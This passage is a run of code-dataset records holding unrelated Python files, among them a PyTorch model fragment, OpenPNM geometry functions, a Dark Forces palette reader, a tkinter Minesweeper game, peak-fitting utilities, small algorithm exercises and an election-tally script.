nhid)\r\n\t\tself.actF = nn.Tanh()\r\n\r\n\t\tself.decoder = nn.Linear(nhid, ntoken)\r\n\r\n\t\tself.initrange = initrange\r\n\t\tself.init_weights()\r\n\t\t\r\n\t\tself.Lsoftmax = nn.LogSoftmax(1)\r\n\t\tself.batch_size = batch_size\r\n\t\t\r\n\tdef init_weights(self):\r\n\t\tself.encoder.weight.data.uniform_(-self.initrange, self.initrange)\r\n\t\tself.decoder.bias.data.fill_(0)\r\n\t\tself.decoder.weight.data.uniform_(-self.initrange, self.initrange)\r\n\t\tself.emb2hid.weight.data.uniform_(-self.initrange, self.initrange)\r\n\r\n\tdef forward(self, input):\r\n\t\temb = self.encoder(input)# emb - [2][32][150] 150 features pre 2 slov, input - 2 x index\r\n\r\n\t\temb = torch.cat(torch.split(emb, 1), 2) # [1][32][300]\r\n\t\temb = emb.view(self.batch_size, -1) # [32][300]\r\n\r\n\t\toutput = self.emb2hid(emb)\r\n\t\toutput = self.actF(output)\r\n\r\n\t\toutput = self.decoder(output) # [32][|V|]\r\n\t\toutput = self.Lsoftmax(output)\r\n\t\treturn output # logsoftmax pre pravdepodobnosti\r\n","sub_path":"model_tanh.py","file_name":"model_tanh.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380724841","text":"r\"\"\"\n===============================================================================\nSubmodule -- throat_surface_area\n===============================================================================\n\n\"\"\"\nimport scipy as _sp\n\n\ndef cylinder(geometry, throat_diameter='throat.diameter',\n throat_length='throat.length', **kwargs):\n r\"\"\"\n Calculate throat area for a cylindrical throat\n \"\"\"\n D = geometry[throat_diameter]\n L = geometry[throat_length]\n value = _sp.constants.pi*D*L\n return value\n\n\ndef cuboid(geometry, throat_diameter='throat.diameter',\n throat_length='throat.length', **kwargs):\n r\"\"\"\n Calculate throat area for a cuboid throat\n \"\"\"\n D = geometry[throat_diameter]\n L = geometry[throat_length]\n value = 4*D*L\n return value\n\n\ndef extrusion(geometry, throat_perimeter='throat.perimeter',\n throat_length='throat.length', **kwargs):\n r\"\"\"\n Calculate surface area from perimeter and length -\n perimeter calculated when throat area is calculated so must be run in\n correct order\n \"\"\"\n P = geometry[throat_perimeter]\n L = geometry[throat_length]\n value = P*L\n return value\n","sub_path":"OpenPNM/Geometry/models/throat_surface_area.py","file_name":"throat_surface_area.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211273380","text":"\"\"\"\nStar Wars Dark Forces color palette functions.\n\nA Dark Forces color palette is a VGA Mode 13h palette.\n\nVGA Mode 13h is limited to 256 colors at 6-bits per channel, so each\nchannel ranges from 0-63 inclusive.\n\nDark Forces treats color 0 as transparent. All others are opaque.\n\"\"\"\nimport struct\n\n# The number of colors present in a palette.\nNUM_COLORS = 256\n\n# The number of channels per color. (RGB)\nNUM_CHANNELS = 3\n\n# The palette color that represents transparency.\nTRANSPARENT_COLOR = 0\n\n\ndef read(filename):\n \"\"\"\n Reads a VGA Mode 13h palette from a file.\n\n :param filename: The palette to read.\n :return: A list of RGB tuples.\n \"\"\"\n palette = []\n\n with open(filename, \"rb\") as file:\n for color in range(NUM_COLORS):\n r = struct.unpack(\"B\", file.read(1))[0]\n g = struct.unpack(\"B\", file.read(1))[0]\n b = struct.unpack(\"B\", file.read(1))[0]\n palette.append((r, g, b))\n\n return palette\n\n\ndef write(filename, vga13h_palette):\n \"\"\"\n Writes a VGA Mode 13h palette to a file.\n\n :param filename: The file to write to.\n :param vga13h_palette: The palette to write.\n :return: None\n \"\"\"\n with open(filename, \"wb\") as file:\n for color in range(NUM_COLORS):\n file.write(struct.pack(\"B\", vga13h_palette[color][0]))\n file.write(struct.pack(\"B\", vga13h_palette[color][1]))\n file.write(struct.pack(\"B\", vga13h_palette[color][2]))\n\n\ndef is_vga13h_palette(vga13h_palette):\n \"\"\"\n Checks if a palette is a valid VGA Mode 13h palette.\n\n :param vga13h_palette: The palette to validate.\n :return: bool\n \"\"\"\n # 256 colors.\n if len(vga13h_palette) != NUM_COLORS:\n return False\n\n for color in range(NUM_COLORS):\n # RGB\n if len(vga13h_palette[color]) != NUM_CHANNELS:\n return False\n # VGA Mode 13h. 6-bits per channel.\n if not ((0 <= vga13h_palette[color][0] < 2 ** 6) and\n (0 <= vga13h_palette[color][1] < 2 ** 6) and\n (0 <= vga13h_palette[color][2] < 2 ** 6)):\n return False\n\n return True\n\n\ndef vga13h_to_rgb(vga13h_palette):\n \"\"\"\n Converts a VGA Mode 13h palette to an 8-bit RGB palette.\n\n :param vga13h_palette: The palette to convert.\n :return: A list of 8-bit RGB tuples.\n \"\"\"\n rgb_palette = []\n\n for color in range(NUM_COLORS):\n rgb_palette.append((vga13h_palette[color][0] << 2,\n vga13h_palette[color][1] << 2,\n vga13h_palette[color][2] << 2))\n\n return rgb_palette\n\n\ndef vga13h_to_rgba(vga13h_palette):\n \"\"\"\n Converts a VGA Mode 13h palette to an 8-bit RGBA palette.\n Only color 0 is transparent. All others are opaque.\n\n :param vga13h_palette: The palette to convert.\n :return: A list of 8-bit RGBA tuples.\n \"\"\"\n rgba_palette = []\n\n for color in range(NUM_COLORS):\n # Color 0 is transparent.\n if color == TRANSPARENT_COLOR:\n rgba_palette.append((vga13h_palette[color][0] << 2,\n vga13h_palette[color][1] << 2,\n vga13h_palette[color][2] << 2, 0))\n # Other colors are opaque.\n else:\n rgba_palette.append((vga13h_palette[color][0] << 2,\n vga13h_palette[color][1] << 2,\n vga13h_palette[color][2] << 2, 255))\n\n return rgba_palette\n\n\ndef rgb_to_vga13h(rgb_palette):\n \"\"\"\n Converts an 8-bit RGB palette to a VGA Mode 13h palette.\n\n :param rgb_palette: The palette to convert.\n :return: A list of 6-bit RGBA tuples.\n \"\"\"\n vga13h_palette = []\n\n for color in range(NUM_COLORS):\n vga13h_palette.append((rgb_palette[color][0] >> 2,\n rgb_palette[color][1] >> 2,\n rgb_palette[color][2] >> 2))\n\n return vga13h_palette\n\n\ndef rgba_to_vga13h(rgba_palette):\n \"\"\"\n Converts an 8-bit RGBA palette to a VGA Mode 13h palette. Transparency\n is discarded. Only color 0 is transparent. All others are opaque.\n\n :param rgba_palette: The palette to convert.\n :return: A list of 6-bit RGB tuples.\n \"\"\"\n # Cannot encode alpha in palette.\n return rgb_to_vga13h(rgba_palette)\n","sub_path":"formats/pal.py","file_name":"pal.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237254563","text":"import tkinter as tk\r\nimport random\r\nfrom tkinter import messagebox\r\n\r\ncnt = 0 #다양한 카운트에 사용될 변수\r\nbomb = 0 # 폭탄 갯수\r\nflag = 0 # 깃발 갯수\r\nButtonchk = [] # 버튼이 체크된 상태인지 아닌지 판별하는 리스트\r\nButton_X = [] # 버튼의 플래그가 됬는지 아닌지 판별하는 리스트\r\nvisit = [[0 for col in range(0)] for row in range(0)] #주변의 0을 찾는 함수에서 사용되는 리스트, 이미 찾은 위치를 표시하기 위하여 사용된다.\r\nButton_map=[] # 화면에 보여질 버튼리스트\r\nMap=[] # 버튼의 실제 값(지뢰인지, 주변의 지뢰가 몇개인지)\r\nX=0 #행\r\nY=0 #열\r\n\r\n#visit 리스트를 초기화시켜주는 함수\r\ndef clear() : \r\n for i in range(X) :\r\n for j in range(Y):\r\n visit[i][j]=0 \r\n\r\n#해당 버튼의 정보를 보여주는 함수\r\ndef Show(self,x1,y1):\r\n self.Num_Button.configure(text = str(Map[x1][y1]))\r\n\r\n#게임을 시작 및 종료하는 클래스\r\nclass Game(tk.Frame) :\r\n\r\n #생성자\r\n def __init__(self, master):\r\n super(Game,self).__init__(master)\r\n self.begin1() #초기는 9X9 실행\r\n self.label=\" \"\r\n menubar = tk.Menu(master) #Menu 생성\r\n filemenu = tk.Menu(menubar, tearoff=0)\r\n filemenu.add_command(label=\"9*9\", command = self.begin1) #9x9\r\n filemenu.add_command(label=\"16*16\", command = self.begin2) #16x16\r\n filemenu.add_command(label=\"30*16\", command = self.begin3) #30*16\r\n filemenu.add_separator()\r\n filemenu.add_command(label=\"Exit\", \r\n command=master.destroy)\r\n menubar.add_cascade(label=\"Menu\", menu=filemenu)\r\n master.config(menu=menubar)\r\n \r\n def begin1(self): #9x9\r\n global X,Y #x축, y축\r\n global bomb #지뢰의 갯수\r\n global flag #flag의 갯수\r\n global visit #find에 사용될 리스트\r\n global Map #버튼의 실제값 -> 지뢰인지 아닌지/ 지뢰면 -1, 지뢰가 아니면 주변의 지뢰 갯수\r\n global Button_map #디스플레이에 사용되는 리스트\r\n global Buttonchk #버튼이 체크되었는지 확인하기 위한 리스트\r\n global Button_X #버튼에 플래그가 활성화되었는지 확인하기 위한 리스트\r\n \r\n #이전에 있던 객체를 초기화시킨다.\r\n for button in Button_map:\r\n for i in button:\r\n i.delete()\r\n X=9 #x=9\r\n Y=9 #y=9\r\n bomb=10 #지뢰=10개\r\n flag=bomb #플래그 수는 지뢰수와 같도록 설정\r\n\r\n #필요한 리스트 초기화\r\n visit= [[0 for col in range(Y)] for row in range(X)]\r\n Map = [[0 for col in range(Y)] for row in range(X)]\r\n Button_X=[[0 for col in range(Y)] for row in range(X)]\r\n Buttonchk=[[0 for col in range(Y)] for row in range(X)]\r\n Button_map=[[Button(0,0) for col in range(Y)] for row in range(X)]\r\n \r\n #각 버튼에 정보를 넣어준다.\r\n for i in range(X) :\r\n for j in range(Y) :\r\n Button_map[i][j]=Button(i,j)\r\n \r\n clear() #visit 리스트 초기화\r\n set_mine(X,Y) #마인 세팅\r\n mine_number(X,Y) #숫자 세팅\r\n\r\n \r\n\r\n def begin2(self):\r\n global X,Y #x축, y축\r\n global bomb #지뢰의 갯수\r\n global flag #flag의 갯수\r\n global visit #find에 사용될 리스트\r\n global Map #버튼의 실제값 -> 지뢰인지 아닌지/ 지뢰면 -1, 지뢰가 아니면 주변의 지뢰 갯수\r\n global Button_map #디스플레이에 사용되는 리스트\r\n global Buttonchk #버튼이 체크되었는지 확인하기 위한 리스트\r\n global Button_X #버튼에 플래그가 활성화되었는지 확인하기 위한 리스트\r\n \r\n #이전에 있던 객체를 삭제한다.\r\n for button in Button_map:\r\n for i in button:\r\n i.delete()\r\n X=16 #x=16\r\n Y=16 #y=16\r\n bomb=50 #지뢰=50개\r\n flag=bomb #플래그 수는 지뢰 수와 같도록 설정\r\n\r\n #필요리스트 초기화\r\n visit= [[0 for col in range(Y)] for row in range(X)]\r\n Map = [[0 for col in range(Y)] for row in range(X)]\r\n Button_X=[[0 for col in range(Y)] for row in range(X)]\r\n Buttonchk=[[0 for col in range(Y)] for row in range(X)]\r\n Button_map=[[Button(0,0) for col in range(Y)] for row in range(X)]\r\n \r\n #각 버튼에 정보를 넣어준다.\r\n for i in range(X) :\r\n for j in range(Y) :\r\n Button_map[i][j]=Button(i,j)\r\n \r\n clear() #visit list 초기화\r\n set_mine(X,Y) #마인 세팅\r\n mine_number(X,Y) #숫자 세팅\r\n\r\n def begin3(self):\r\n global X,Y #x축, y축\r\n global bomb #지뢰의 갯수\r\n global flag #flag의 갯수\r\n global visit #find에 사용될 리스트\r\n global Map #버튼의 실제값 -> 지뢰인지 아닌지/ 지뢰면 -1, 지뢰가 아니면 주변의 지뢰 갯수\r\n global Button_map #디스플레이에 사용되는 리스트\r\n global Buttonchk #버튼이 체크되었는지 확인하기 위한 리스트\r\n global Button_X #버튼에 플래그가 활성화되었는지 확인하기 위한 리스트\r\n for item in Button_map:\r\n for i in item:\r\n i.delete()\r\n X=30 #x=30\r\n Y=16 #y=16\r\n bomb=99 #지뢰=99\r\n flag=bomb #플래그 수는 지뢰수와 같도록 설정\r\n\r\n #필요리스트 초기화\r\n visit= [[0 for col in range(Y)] for row in range(X)]\r\n Map = [[0 for col in range(Y)] for row in range(X)]\r\n Button_X=[[0 for col in range(Y)] for row in range(X)]\r\n Buttonchk=[[0 for col in range(Y)] for row in range(X)]\r\n Button_map=[[Button(0,0) for col in range(Y)] for row in range(X)]\r\n \r\n #각 버튼에 정보를 넣어준다.\r\n for i in range(X) :\r\n for j in range(Y) :\r\n Button_map[i][j]=Button(i,j)\r\n \r\n clear() #visit list 초기화\r\n set_mine(X,Y) #마인 세팅\r\n mine_number(X,Y) #숫자 세팅\r\n\r\n#Button의 정보를 관리하는 클래스\r\nclass Button :\r\n #변수 선언 및 지역변수 활용\r\n global cnt\r\n global Map\r\n global bomb\r\n global flag\r\n \r\n #생성자\r\n def __init__(self, x,y):\r\n self.button_x=x\r\n self.button_y=y\r\n self.Num_Button=tk.Button(root,width=5,background='darkgray') #색상 설정\r\n self.Num_Button.grid(row=y, column=x, ipady = 5) # 맵 크기 설정\r\n self.Num_Button.bind('', self.Left) #왼쪽 클릭일 때 Left함수 실행\r\n self.Num_Button.bind('', self.Right) #오른쪽 클릭 일 때 Right함수 실행\r\n \r\n #버튼의 정보를 보여주는 함수\r\n def show(self,x,y):\r\n self.Num_Button.configure(text = str(Map[x][y]))\r\n \r\n #버튼 객체를 삭제하는 함수\r\n def delete(self): \r\n self.Num_Button.grid_forget() \r\n\r\n #왼쪽클릭 시 동작하는 함수\r\n def Left(self,event):\r\n #버튼에 플래그가 없을 때 동작\r\n if(Button_X[self.button_x][self.button_y]==0):\r\n #버튼이 지뢰일 경우\r\n if(Map[self.button_x][self.button_y]==-1):\r\n #게임 종료\r\n Game_over()\r\n #버튼이 0일 경우 \r\n elif(Map[self.button_x][self.button_y]==0):\r\n #버튼의 정보를 보여준다.\r\n Button_map[self.button_x][self.button_y].show(self.button_x,self.button_y)\r\n #주변의 0을 찾아서 열어준다.\r\n find_zero(self.button_x,self.button_y) \r\n #버튼이 클릭되었다는 것을 체크한다.\r\n Buttonchk[self.button_x][self.button_y]=1\r\n \r\n #버튼이 0,-1이 아닌 나머지의 경우\r\n else :\r\n #버튼의 정보를 보여준다.\r\n Button_map[self.button_x][self.button_y].show(self.button_x,self.button_y)\r\n #버튼이 클릭되었다는 것을 체크한다.\r\n Buttonchk[self.button_x][self.button_y]=1\r\n \r\n \r\n #플래그가 다 표시 되었을 때\r\n if (flag == 0):\r\n #카운트를 해주기 위한 변수 초기화\r\n cnt = 0 \r\n for i in range(X):\r\n for j in range(Y):\r\n #버튼이 체크되어있고, 지뢰가 아닐경우\r\n if (Buttonchk[i][j] == 1 and not Map[i][j] == -1):\r\n #카운트 증가\r\n cnt += 1\r\n #카운트가 전체에서 지뢰의 갯수를 뺀 값과 같을 때\r\n if cnt == X*Y-bomb:\r\n #게임 클리어\r\n Game_clear()\r\n \r\n #오른쪽 클릭일 때 동작하는 함수\r\n def Right(self,event):\r\n #flag변수 선언 및 지역변수 활용\r\n global flag\r\n #버튼에 플래그가 없고, 버튼이 체크되어있지 않은 경우\r\n if(not Button_X[self.button_x][self.button_y]==1 and Buttonchk[self.button_x][self.button_y]==0):\r\n #플래그의 갯수가 0이 아닐 때까지\r\n if(flag>0):\r\n #플래그 할 버튼을 빨간색으로 변경\r\n Button_map[self.button_x][self.button_y].Num_Button[\"bg\"]=\"red\"\r\n #버튼이 플래그 되어있음을 체크\r\n Button_X[self.button_x][self.button_y]=1\r\n #남은 플래그 가능 횟수 감소\r\n flag-=1\r\n #버튼이 플래그가 이미 되어있는 경우\r\n elif(Button_X[self.button_x][self.button_y] == 1):\r\n #버튼을 원래 색깔로 변경\r\n Button_map[self.button_x][self.button_y].Num_Button[\"bg\"] = \"darkgrey\"\r\n #버튼의 플래그 체크를 해제\r\n Button_X[self.button_x][self.button_y] = 0\r\n #남은 플래그 가능 횟수 증가\r\n flag += 1\r\n\r\n #플래그를 다 체크하였을 경우\r\n if (flag == 0):\r\n #카운트 변수 초기화\r\n cnt = 0\r\n for i in range(X):\r\n for j in range(Y):\r\n if (Button_X[i][j]==1):\r\n cnt += 1\r\n #지뢰갯수와 플래그의 갯수가 같을 때\r\n if cnt == bomb :\r\n Game_clear()\r\n\r\n#주변의 0을 찾는 함수\r\ndef find_zero(x,y):\r\n\r\n dir = [[0,1],[0,-1],[1,0],[-1,0]] #움직일 방향을 위한 리스트\r\n global Map #실제 정보를 저장한 map 리스트\r\n global Buttonchk #버튼이 클릭되었는지 확인하기 위한 리스트\r\n global Button_X #플래그가 되어있는지 확인하기 위한 리스트\r\n global X #행\r\n global Y #열\r\n\r\n #버튼이 행의 범위를 벗어났을 경우\r\n if(x < 0 or x >= X): \r\n return 0\r\n #버튼이 열의 범위를 벗어났을 경우\r\n if(y < 0 or y >= Y): \r\n return 0\r\n\r\n #버튼이 체크되어 있거나 플래그가 되어있을 때 탐색 종료\r\n if(Buttonchk[x][y]==1 or Button_X[x][y]==1):\r\n return 0\r\n \r\n #처음 방문하는 버튼일 경우 \r\n if visit[x][y] == 0:\r\n #방문했음을 체크\r\n visit[x][y] = 1\r\n #버튼이 0일 경우\r\n if Map[x][y] == 0:\r\n #버튼의 정보를 보여주고, 체크되었음을 표시\r\n Button_map[x][y].show(x,y)\r\n Buttonchk[x][y] = 1\r\n #버튼이 0보다 클경우\r\n elif Map[x][y] > 0:\r\n #버튼의 정보를 보여주고, 체크되었음을 표시 후 탐색 종료\r\n Button_map[x][y].show(x,y)\r\n Buttonchk[x][y] = 1\r\n return 0\r\n #위/아래/오른쪽/왼쪽으로 탐색을 반복\r\n for i in range(4):\r\n find_zero(x+dir[i][0],y+dir[i][1])\r\n #이미 방문한 버튼일 경우 탐색 종료\r\n else :\r\n return 0\r\n\r\n \r\n\r\n#주위의 지뢰 갯수를 리턴\r\ndef count_bomb(x,y,X,Y):\r\n #객체 생성 및 지역변수 활용\r\n global Map\r\n global cnt\r\n cnt=0\r\n\r\n for i in range(-1,2):\r\n for j in range(-1,2): \r\n #범위를 벗어나는 경우 넘겨준다.\r\n if x+i < 0: \r\n continue\r\n if X-1 parameters are [(a1, a2), ]\n# function b -> parameters are [(b1, b2, b3), ]\n#\n# note the 1-element list\n# it allows to simply write `param_a+b = param_a + param_b`\n# when two functions are added\n#\n# Sum(f_a, f_b) -> parameters are [(a1, a2), (b1, b2, b3)]\n#\n# `estimate_param` returns a flattened version of the parameter\n# (a1, a2, b1, b2 b3)\n#\n# -\n\nclass Linear:\n \"\"\"Linear function\"\"\"\n def __init__(self, slope=None, intercept=None):\n self.slope_init = slope\n self.intercept_init = intercept\n self.param_names = [('slope', 'intercept'), ]\n self.name = ['Linear', ]\n\n def __call__(self, x, slope, intercept):\n return x*slope + intercept\n\n def estimate_param(self, x, y):\n if not self.slope_init:\n self.slope_init = (y[-1] - y[0])/(x[-1] - x[0])\n if not self.intercept_init:\n self.intercept_init = y[0] - self.slope_init*x[0]\n\n return self.slope_init, self.intercept_init\n\n\nclass Gauss:\n \"\"\"Gaussian function\"\"\"\n def __init__(self, x0=None, fwhm=None, ampl=None):\n self.x0_init = x0\n self.fwhm_init = fwhm\n self.amplitude_init = ampl\n self.param_names = [('x0', 'fwhm', 'amplitude'), ]\n self.name = ['Gaussian', ]\n\n def __call__(self, x, x0, fwhm, amplitude):\n sigma = fwhm /( 2*np.sqrt(2*np.log(2)) )\n return amplitude * np.exp( -(x-x0)**2/(2*sigma**2) )\n\n def estimate_param(self, x, y):\n if not self.x0_init:\n self.x0_init = x[np.argmax(y)]\n if not self.fwhm_init:\n self.fwhm_init = np.ptp( x[ y > (y.min() + y.max())/2 ] )\n if not self.amplitude_init:\n self.amplitude_init = np.ptp(y)\n\n return self.x0_init, self.fwhm_init, self.amplitude_init\n\n\nclass Lorentzian:\n \"\"\"Lorentzian function (or Cauchy distribution)\n\n I = 1/( 1 + x^2 )\n \"\"\"\n def __init__(self, x0=None, fwhm=None, ampl=None):\n self.x0_init = x0\n self.fwhm_init = fwhm\n self.amplitude_init = ampl\n self.param_names = [('x0', 'fwhm', 'amplitude'), ]\n self.name = ['Lorentzian', ]\n\n def __call__(self, x, x0, fwhm, amplitude):\n hwhm = fwhm / 2\n u = x - x0\n return amplitude/( 1 + (u/hwhm)**2 )\n\n def estimate_param(self, x, y):\n if not self.x0_init:\n self.x0_init = x[np.argmax(y)]\n if not self.fwhm_init:\n self.fwhm_init = np.ptp( x[ y > (y.min() + y.max())/2 ] )\n if not self.amplitude_init:\n self.amplitude_init = np.ptp(y)\n\n return self.x0_init, self.fwhm_init, self.amplitude_init\n\n\nclass PseudoVoigt:\n \"\"\"PseudoVoigt function\n\n approximation of the Voigt function\n weighted sum of Gaussian and Lorentzian function\n\n PV(x) = eta*G(x) + (1-eta)*L(x)\n\n # see:\n # https://docs.mantidproject.org/nightly/fitting/fitfunctions/PseudoVoigt.html\n \"\"\"\n def __init__(self, x0=None, fwhm=None, ampl=None, eta=None):\n self.x0_init = x0\n self.fwhm_init = fwhm\n self.amplitude_init = ampl\n self.eta_init = eta\n self.param_names = [('x0', 'fwhm', 'amplitude', 'eta'), ]\n self.name = ['PseudoVoigt', ]\n\n def __call__(self, x, x0, fwhm, amplitude, eta):\n hwhm = fwhm / 2\n u = x - x0\n\n L = hwhm/(u**2 + hwhm**2)/np.pi\n\n sigma = hwhm / np.sqrt(2*np.log(2))\n norm_G = 1/(sigma * np.sqrt(2*np.pi))\n G = norm_G * np.exp( -(x-x0)**2/(2*sigma**2) )\n\n I = amplitude*np.pi*hwhm/(1 + eta*(np.sqrt(np.pi*np.log(2)) - 1))\n return ( eta*G + (1 - eta)*L ) * I\n\n def estimate_param(self, x, y):\n if not self.x0_init:\n self.x0_init = x[np.argmax(y)]\n if not self.fwhm_init:\n self.fwhm_init = np.ptp( x[ y > (y.min() + y.max())/2 ] )\n if not self.amplitude_init:\n self.amplitude_init = np.ptp(y)\n if not self.eta_init:\n self.eta_init = 0.5\n\n return self.x0_init, self.fwhm_init, \\\n self.amplitude_init, self.eta_init\n\n\nclass Sum:\n \"\"\"Build a new function as the sum of two functions\"\"\"\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n # param are list of list\n self.param_names = a.param_names + b.param_names\n self.name = (*a.name, *b.name)\n\n def __call__(self, x, *p):\n nargs_a = sum(len(u) for u in self.a.param_names)\n p_a = p[:nargs_a]\n p_b = p[nargs_a:]\n return self.a(x, *p_a) + self.b(x, *p_b)\n\n def estimate_param(self, x, y):\n p_a = self.a.estimate_param(x, y)\n p_b = self.b.estimate_param(x, y)\n return (*p_a, *p_b)\n\n\ndef peakfit(x, y, function=Gauss(), background=Linear()):\n \"\"\"Fit the data (x, y) using the provided function\n\n The background function is summed to the function\n - Default function is `Gauss()`\n - Default background is `Linear()`\n - Set to `̀None` if no background is wanted.\n\n Returns:\n - list of dictionary parameters (one for each function)\n - global fit function with optimal parameters\n \"\"\"\n\n if background is not None:\n function = Sum(function, background)\n\n p0 = function.estimate_param(x, y)\n\n popt, pcov = curve_fit(function, x, y, p0)\n parameter_err = np.sqrt(np.diag(pcov))\n\n result = []\n idx = 0\n for f_name, params in zip(function.name, function.param_names):\n res = {'function':f_name}\n for param in params:\n res[param] = popt[idx]\n res[param + '_std'] = parameter_err[idx]\n idx += 1\n\n result.append(res)\n\n return result, lambda x:function(x, *popt)\n\n\ndef results_summary(results):\n \"\"\"Generate text summary of the parameters\"\"\"\n max_length = max(len(k) for r in results for k in r.keys()\n if k != 'function' and 'std' not in k) + 1\n summary = ''\n for r in results:\n summary += r['function'] + '\\n'\n for name, value in r.items():\n if name == 'function' or 'std' in name:\n continue\n summary += f\" {name+':': <{max_length}}{value: 0.3f}\\n\"\n return summary\n\n\ndef plot_results(x, y,\n results=None, fit=None,\n save_path=None, save_name=None):\n \"\"\"Generate summary graph of fit results\"\"\"\n fig, ax = plt.subplots()\n ax.plot(x, y, '.k', label='data')\n if fit:\n ax.plot(x, fit(x), 'r-', label='fit')\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.legend()\n if results:\n ax.text(0.01, 0.99, results_summary(results),\n transform=ax.transAxes,\n fontfamily='monospace',\n verticalalignment='top')\n if save_name:\n ax.set_title(save_name)\n\n if save_path:\n if save_name:\n figname = save_name+'.png'\n else:\n hashvalues = list(f\"{k}_{str(v)[:5].replace('.', 'p')}\"\n for r in results for k, v in r.items()\n if k != 'function' and 'std' not in k)\n figname = '_'.join(hashvalues[:2]) + '.png'\n\n path = os.path.join(save_path, figname)\n fig.savefig(path)\n \n return fig\n","sub_path":"sin2_psi/peakfit.py","file_name":"peakfit.py","file_ext":"py","file_size_in_byte":7678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510201425","text":"from __future__ import print_function, division\n\ncache = {}\ndef ackermann(m, n):\n\tif m == 0:\n\t\treturn n + 1\n\tif n == 0:\n\t\treturn ackermann(m-1, 1)\n\tif (m, n) in cache:\n\t\treturn cache[m, n]\n\telse:\n\t\tcache[m, n] = ackermann(m -1, ackermann(m, n -1))\n\t\treturn cache[m ,n]\n\nprint(ackermann(3, 4))\nprint(ackermann(3, 6))","sub_path":"python_code/textbooks/think_python/ex11-3.py","file_name":"ex11-3.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78331248","text":"class Solution:\n def robOne(self, i, nums, memo):\n if i >= len(nums):\n return 0\n elif i in memo:\n return memo[i]\n profit = max(nums[i] + self.robOne(i+2, nums, memo), self.robOne(i+1, nums, memo))\n memo[i] = profit\n return profit\n \n def rob(self, nums: List[int]) -> int:\n if not nums: return 0\n if len(nums) < 3: return max(nums)\n \n first = nums[:-1]\n second = nums[1:]\n return max(self.robOne(0, first, {}), self.robOne(0, second, {}))","sub_path":"week-3/recursion-memoization/HouseRobberII.py","file_name":"HouseRobberII.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"554577020","text":"'''\r\nQno3.\r\nWrite a Python program to get a single string from two given strings, separated by a space and\r\nswap the first two characters of each string.\r\n\r\n'''\r\n\r\n\r\nstring = input(\"enter the string: \")\r\n\r\na,b=string.split(\" \")\r\n\r\na, b = a.replace(a[:2], b[:2]) , b.replace(b[:2], a[:2])\r\n\r\nprint(a+\",\"+b)\r\n\r\n","sub_path":"FinjoAss2/Qno3.py","file_name":"Qno3.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136460499","text":"# PyPoll Challenge written in Visual Studio Code by Nick Rosing\n# import modules\nimport os\nimport csv\n\n# Lists for csv columns\nvoter_id = []\ncandidates = []\n\n# Set file path\nvotes_csv = os.path.join(\".\", \"Resources\", \"election_data.csv\")\n\n# Open and read Poll Data-csv file, skipping header\nwith open(votes_csv,encoding=\"utf-8\", newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n csv_header = next(csvreader)\n\n # assign columns to lists\n for row in csvreader:\n voter_id.append(row[0])\n candidates.append(row[2])\n\n# Create variables for all of the counts/percentages per candidate\ntotal_votes = len(voter_id)\nkhan_count = candidates.count('Khan')\nkhan_percent = khan_count/total_votes\ncorrey_count = candidates.count('Correy')\ncorrey_percent = correy_count/total_votes\nli_count = candidates.count('Li')\nli_percent = li_count/total_votes\notooley_count = candidates.count(\"O'Tooley\")\notooley_percent = otooley_count/total_votes\n\n# Determine the winner\nwinner = max(khan_count, correy_count, li_count, otooley_count)\n\nif winner == khan_count:\n winner_name = \"Khan\"\nelif winner == correy_count:\n winner_name = \"Correy\"\nelif winner == li_count:\n winner_name = \"Li\"\nelse:\n winner_name = \"O'Tooley\"\n\n# Create Poll results terminal output\nprint(f\"Election Results\")\nprint(f\"-------------------------\")\nprint(f\"Total Votes: {total_votes}\")\nprint(f\"-------------------------\")\nprint(f\"Khan: {khan_percent:.3%} ({khan_count})\")\nprint(f\"Correy: {correy_percent:.3%} ({correy_count})\")\nprint(f\"Li: {li_percent:.3%} ({li_count})\")\nprint(f\"O'Tooley: {otooley_percent:.3%} ({otooley_count})\")\nprint(f\"-------------------------\")\nprint(f\"Winner: {winner_name}\")\nprint(f\"-------------------------\")\n\n# Push results into Text file\n# Create path for file to be written to\noutcome_file = os.path.join(\".\", \"Resources\", \"election_results.text\")\n\n# open file in \"write\" mode\nwith open (outcome_file, \"w\",) as txtfile:\n\n txtfile.write(f\"Election Results\\n\")\n txtfile.write(f\"-------------------------\\n\")\n txtfile.write(f\"Total Votes: {total_votes}\\n\")\n txtfile.write(f\"-------------------------\\n\")\n txtfile.write(f\"Khan: {khan_percent:.3%} ({khan_count})\\n\")\n txtfile.write(f\"Correy: {correy_percent:.3%} ({correy_count})\\n\")\n txtfile.write(f\"Li: {li_percent:.3%} ({li_count})\\n\")\n txtfile.write(f\"O'Tooley: {otooley_percent:.3%} ({otooley_count})\\n\")\n txtfile.write(f\"-------------------------\\n\")\n txtfile.write(f\"Winner: {winner_name}\\n\")\n txtfile.write(f\"-------------------------\")","sub_path":"PyPoll/poll_main.py","file_name":"poll_main.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305323065","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2021.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"Half angle characterization.\"\"\"\n\nfrom typing import List, Optional, Sequence\nimport numpy as np\n\nfrom qiskit import QuantumCircuit\nfrom 